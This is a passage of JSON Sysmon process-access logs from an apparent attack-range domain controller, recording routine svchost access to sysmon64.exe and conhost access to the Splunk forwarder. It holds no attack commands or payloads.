07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1957,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1958,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1959,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1960,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1961,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1962,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1963,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1964,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010E3900300}\r\nTargetProcessId: 3076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010E3900300}","TargetProcessId":"3076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
